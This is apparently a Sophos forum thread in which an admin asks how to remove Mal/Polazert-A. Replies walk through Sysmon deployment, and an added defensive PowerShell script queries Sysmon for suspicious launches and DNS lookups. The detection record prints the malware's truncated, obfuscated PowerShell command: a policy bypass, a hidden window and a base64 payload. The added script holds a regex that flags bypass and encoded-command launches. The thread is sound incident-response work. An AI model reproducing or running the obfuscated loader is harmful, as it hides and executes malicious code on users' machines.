Mal/Polazert-A Removal?

I have two endpoints at two totally unrelated clients where Sophos detected Mal/Polazert-A. Sophos is good at telling me about it, but it doesn't give me any options to remove it. Every time the client reboots their computer, they get a popup from Sophos after login that Sophos found this malware. Now I am concerned it is still running somehow and our client wants to know why we aren't removing malware from their computer.

I explain that Sophos detected and terminated it, but like me, they want to know why it is still there.

How do I remove it?

Details of the infection from Sophos Central:

Path: c:\windows\system32\windowspowershell\v1.0\powershell.exe
Name: powershell.exe
Command line: "PowerShell.exe" -EP byPAss -cOmMAnD "$a754ea6e8b041aa5b575492443c23=AdD-TypE -memBERDEfINITIon ('['+'d'.tOuppER()+'lL'.tolower()+'i'.Toupper()+'MpOrT('.toLOWeR()+[CHAr]0X22+'user32.DLl'.TOLoWer()+[CHar]0x22+')]PuBLIC sTATic extern BOol '.ToLOwEr()+'s'.tOupPEr()+'hOw'.ToLOWer()+'w'.TOupper()+'IndOw'.TOLoWeR()+'a'.TOupPEr()+'SYnc('.ToLower()+'i'.toUPper()+'nT'.tOLoweR()+'p'.tOUPper()+'Tr hwND, iNT NcmDSHow);'.toLOWER()) -naME ('W'.tOupPeR()+'iN32'.toLOweR()+'s'.TOUppEr()+'HoW'.TOLOwEr()+'w'.toUppeR()+'INDOW'.TOlOWeR()+'a'.tOUPPEr()+'SyNc'.TOlOWeR()) -nameSpacE WiN32FUNCTioNs -PAssThru;$a754ea6e8b041aa5b575492443c23::shoWWInDOWASYnc((gET-PROcess -id $Pid).mAiNWiNdOWHANdLE, 0);$a42b0d88df94e2b6b9453ae110cca='QHwmS1BAUnFIdEB3dChiQFZBPHJAVFEpel5uOzwzXk9+OGFeUTUrXkBSX0hGQHdKTXJeUjx6VEBWU0okQHFuJERAcW0pUUBSXyFvQHNfckxeTkYmTV5uJDZOQH04Tm9Ae1lIZV5NISlDXk07UiZeTyV5WkB7aFp4QHwmTmJeUnZDSUB1aVpLXlBHWl5AUzJCI15QckJiQH5NbyFAYHttJkB9aXVhXlBRZlVAUzQ0WEB0TTRuQHcxUFJeT3c3IV5ucm5pXlByVzhAeytXVEB2NWwwPCVeczB1I20wdGZ0I3g=';$a1bfc0
Process ID: 8456
Process executed by: <domain>\Admin1
SHA256: 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
Start time: Feb 9, 2022 7:51 PM
End time: Feb 9, 2022 7:51 PM
Duration: 7s 69ms
Actions done to this artifact: None
Actions performed by this artifact:
  162 File reads
  122 Registry value sets
  19 File writes
  9 File deletions
  2 File renames

-Mike


  • Hello,

    I suppose we can tackle it step by step.

    The first thing would be to decide how to deploy it. If you're using Live Response as a test, I would do so as before with Autoruns:

    1. Type:

    Powershell

    Enter, to start a PowerShell prompt.

    2. Make a temp directory for Sysmon in the root of the C drive, type the following as you're in a PowerShell prompt:

    New-Item -Path "c:\" -Name "Sysmon" -ItemType "directory"

    3. change to that new directory:

    CD \Sysmon

    4. Download Sysmon from Sysinternals.com to the same directory, by running:

    Invoke-WebRequest live.sysinternals.com/Sysmon.exe -UseBasicParsing -OutFile sysmon.exe

    5. Download the config file for logging DNS requests to the directory also. I've copied the above XML into a new Pastebin resource so it's publicly available:

    Invoke-WebRequest https://pastebin.com/raw/ve9M84wZ  -OutFile sysmon-config-dns.xml

    6. Install Sysmon by running:

    &"./sysmon.exe" /accepteula -i

    7. Configure it with the config file downloaded to the same directory:

    &"./sysmon.exe" -c .\sysmon-config-dns.xml

    8. Optionally, run:

    Fltmc.exe

    This will confirm the SysmonDrv filter driver is running.

    At this point you should be able to start running the queries to use the Sysmon event log.

    Hope it helps.

  • To make it easier, you could just launch Live Response. Run PowerShell.exe to get a PS prompt and then paste:

    New-Item -Path "c:\" -Name "Sysmon" -ItemType "directory"
    CD \Sysmon
    Invoke-WebRequest live.sysinternals.com/Sysmon.exe -UseBasicParsing -OutFile sysmon.exe
    Invoke-WebRequest https://pastebin.com/raw/ve9M84wZ  -OutFile sysmon-config-dns.xml
    &"./sysmon.exe" /accepteula -i
    &"./sysmon.exe" -c .\sysmon-config-dns.xml
    Fltmc.exe

    This will carry out all the commands in one go.
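The two replies above install Sysmon with a DNS-logging config, but the thread never shows the query that is then run against the Sysmon event log, nor how to tie a lookup back to the process that made it. The script below is an added example, not code from the thread or from Sophos: it performs the same deployment with a constructed inline config (logging every process creation and every DNS query, in place of the Pastebin file), then defines two query functions over the Sysmon log. `Find-SuspiciousPowerShell` looks for Sysmon event ID 1 (process creation) where powershell.exe was started with an execution-policy bypass or an encoded command, the launch pattern shown in the original post; `Get-SysmonDnsQueries` summarises Sysmon event ID 22 (DNS query) by image and query name. The directory name, the regular expression, the Sysmon schema version 4.50, and the function names are assumptions of this example; it must be run as Administrator (for instance in the Live Response prompt) on a host with outbound access to live.sysinternals.com.

```powershell
# Added example (not from the thread): deploy Sysmon with an inline config, then
# query its event log for the PowerShell launch pattern from the original post
# and for the DNS lookups made on this host. Assumes an elevated prompt,
# outbound access to live.sysinternals.com, and Sysmon config schema 4.50+.

$SysmonDir = 'C:\Sysmon'                      # assumed location, as in the thread
New-Item -Path $SysmonDir -ItemType Directory -Force | Out-Null

# Constructed config: "onmatch=exclude" with no rules means "log every event of that type".
@'
<Sysmon schemaversion="4.50">
  <EventFiltering>
    <RuleGroup name="" groupRelation="or">
      <ProcessCreate onmatch="exclude" />
    </RuleGroup>
    <RuleGroup name="" groupRelation="or">
      <DnsQuery onmatch="exclude" />
    </RuleGroup>
  </EventFiltering>
</Sysmon>
'@ | Set-Content -Path "$SysmonDir\sysmon-config.xml" -Encoding ASCII

Invoke-WebRequest -Uri 'https://live.sysinternals.com/Sysmon.exe' -UseBasicParsing `
                  -OutFile "$SysmonDir\sysmon.exe"

# Fresh install with the config in one step; if Sysmon is already there, just reload the config.
if (Get-Service -Name Sysmon, Sysmon64 -ErrorAction SilentlyContinue) {
    & "$SysmonDir\sysmon.exe" -accepteula -c "$SysmonDir\sysmon-config.xml"
} else {
    & "$SysmonDir\sysmon.exe" -accepteula -i "$SysmonDir\sysmon-config.xml"
}

# Confirm the minifilter driver is loaded (same check as "Fltmc.exe" in the thread).
fltmc.exe filters | Select-String -Pattern 'SysmonDrv'

$SysmonLog = 'Microsoft-Windows-Sysmon/Operational'

# Flatten a Sysmon event's EventData into one object with a property per field.
function ConvertFrom-SysmonEvent {
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    $data = @{ TimeCreated = $Event.TimeCreated; Id = $Event.Id }
    foreach ($d in ([xml]$Event.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    [pscustomobject]$data
}

# Assumed pattern: execution-policy bypass (the "-EP byPAss" from the post, any casing)
# or an encoded command. Case-insensitive, so the case-jumbling in the sample does not hide it.
$BypassPattern = '(?i)-(ep|ex|executionpolicy)\s+bypass|-(e|ec|enc|encodedcommand)\s'

function Test-SuspiciousCommandLine {
    param([string]$CommandLine)
    [bool]($CommandLine -match $BypassPattern)
}

# Event ID 1 (process creation): PowerShell launched with the pattern above.
function Find-SuspiciousPowerShell {
    param([datetime]$Since = (Get-Date).AddDays(-1))
    Get-WinEvent -FilterHashtable @{ LogName = $SysmonLog; Id = 1; StartTime = $Since } -ErrorAction SilentlyContinue |
        ForEach-Object { ConvertFrom-SysmonEvent $_ } |
        Where-Object { $_.Image -match 'powershell\.exe$' -and (Test-SuspiciousCommandLine $_.CommandLine) } |
        Select-Object TimeCreated, ProcessId, User, ParentImage, ParentCommandLine, CommandLine
}

# Event ID 22 (DNS query): which image asked for which name, newest first.
function Get-SysmonDnsQueries {
    param([datetime]$Since = (Get-Date).AddDays(-1), [string]$QueryNameFilter = '.*')
    Get-WinEvent -FilterHashtable @{ LogName = $SysmonLog; Id = 22; StartTime = $Since } -ErrorAction SilentlyContinue |
        ForEach-Object { ConvertFrom-SysmonEvent $_ } |
        Where-Object { $_.QueryName -match $QueryNameFilter } |
        Group-Object Image, QueryName |
        ForEach-Object {
            [pscustomobject]@{
                Count     = $_.Count
                Image     = $_.Group[0].Image
                QueryName = $_.Group[0].QueryName
                LastSeen  = ($_.Group.TimeCreated | Measure-Object -Maximum).Maximum
            }
        } | Sort-Object LastSeen -Descending
}

# The (truncated) command line from the original post, constructed here as sample input: returns True.
Test-SuspiciousCommandLine '"PowerShell.exe" -EP byPAss -cOmMAnD "$a754ea6e8b041aa5b575492443c23=AdD-TypE ..."'

Find-SuspiciousPowerShell | Format-List
Get-SysmonDnsQueries      | Format-Table -AutoSize
```

Two practical notes. Sysmon's event ID 22 is raised for DNS queries made by processes on the host where Sysmon is installed, so it attributes a lookup to an image (and, via event ID 1, to its parent and command line) only when run on the endpoint that triggered the detection; on a DNS server it will not tell you which downstream client asked the forwarder. And because the original post shows the detection recurring after every reboot and 122 registry value sets by the artifact, the `ParentImage` and `ParentCommandLine` columns of the event ID 1 hit are the first thing to read: they show what relaunches powershell.exe at logon, which is the persistence that needs removing.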

  • That all worked, thank you. I set it up on the DNS server (the 192.168.25.6 address).

    I waited for the threat to be detected, and it happened. That is the order, from bottom to top, of the three DNS forwarders in AD DNS.

    I ran the query, and nothing looks malicious:

    I can't figure out which of that is sending off requests to that malware URL. Does anything look suspicious to you?

    -Mike

  • Hi Mike, nothing from that result set looks of concern, but then I'm not sure how the times match up. I don't really use the XG to give you better advice. I would create a new post in the XG section and maybe reference this page. They must run into this scenario quite a lot. I'm sure they would know what to recommend.

    Thanks.